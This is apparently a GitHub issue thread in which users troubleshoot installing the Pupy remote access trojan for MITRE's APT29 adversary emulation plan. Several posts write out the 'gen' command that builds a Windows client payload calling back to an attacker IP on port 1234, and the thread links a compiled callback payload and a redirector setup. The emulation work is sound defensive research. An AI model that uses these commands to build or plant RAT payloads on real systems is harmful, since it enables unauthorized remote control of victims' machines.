File pupy/conf/docker-compose.yml doesn't exist after install

[mark777t]

Tested on Ubuntu 18.04.3 LTS

Scenario: As described in the install_day1_tools.sh (https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/install_day1_tools.sh)

Install pre-reqs

sudo apt update -y sudo apt install curl git -y

Install Pupy RAT

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy ./install.sh sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml

sed command failed because docker-compose.yml doesn't exist.

(docker installed on the system)

Can you please provide steps to fix this issue?

Thanks

[jcwilliamsATmitre]

@mark777t sorry to hear you ran into issues. It looks like Pupy has been going through some updates, but check out their Installation guidance -- https://github.com/n1nj4sec/pupy/wiki/Installation. In this case you just need to get Pupy installed and listen on port 1234.

Also, @Cyb3rWard0g had success using a fork and checking out an older branch -- https://github.com/Cyb3rWard0g/docker-pupy/blob/master/20191226/Dockerfile#L56-L58. You may be able to just use his Docker image as well -- https://github.com/Cyb3rWard0g/docker-pupy

[Cyb3rWard0g]

Hey @mark777t , yeah Pupy from last year to today (A lot has changed). I had to create my own image and align it with the latest commit that worked with the setup for Day 1 emulation. The instructions in the README should work for you to try Day 1 😄 .

README: https://github.com/Cyb3rWard0g/docker-pupy SCRIPT to setup adversary depending on what day or scenario you are testing: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh

This is the part of the script that I use to run Day 1: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh#L91-L96

Video 😆 : https://youtu.be/fJAuBrzYTzI

[mark777t]

Hey @Cyb3rWard0g @jcwilliamsATmitre , Thank you for help. Other issue i get stuck with is, there is no static ip on my machine, trying to create payload gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234 According to the output payload is in the /opt/pupy/pupy/cod.3aka3.scr, but this directory not exist. Also can't change the output directory. How did you create the payload?

[jcwilliamsATmitre]

@mark777t check out https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payload_configs.md#create-day-1-payloads. We have also included a compiled payload (calling back to 192.168.0.5, https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads/cod.3aka3.scr) but if you want to generate your own we used the command gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234. Here's the documentation from Pupy too if that helps - https://github.com/n1nj4sec/pupy/wiki/Get-Started#payloads-generation

You will need a static IP on your attacker host (or redirector if we decide to use one) though so the payload has somewhere consistent to reach back to

[mark777t]

Found the payload file. In case of Cyb3rWard0g setup the location is in the docker: /var/lib/docker/overlay2/......./opt/pupy/pupy.....

[mark777t]

@Cyb3rWard0g How did you configure the cod.3aka3.scr payload? I configured it to the linux ip port 1234 (gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234). But when i run it there is no connection to the listener. Telnet to the port 1234 and linux IP works properly. Windows defender is disabled, firewall is disabled too on the windows 10 side. Also i see that there is a docker IP that is different from the machine IP.

[Cyb3rWard0g]

Hey @mark777t , I just used the one provided with the results in here: https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads and just align my environment with almost all default settings: https://github.com/OTRF/mordor-labs/tree/master/environments/attack-evals/apt29

[Cyb3rWard0g]

Also remember that Day 1 has a redirector for Pupy. This is how I set up the redirector and pupy from a network perspective: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/azuredeploy.json#L286-L311 . I hope that helps.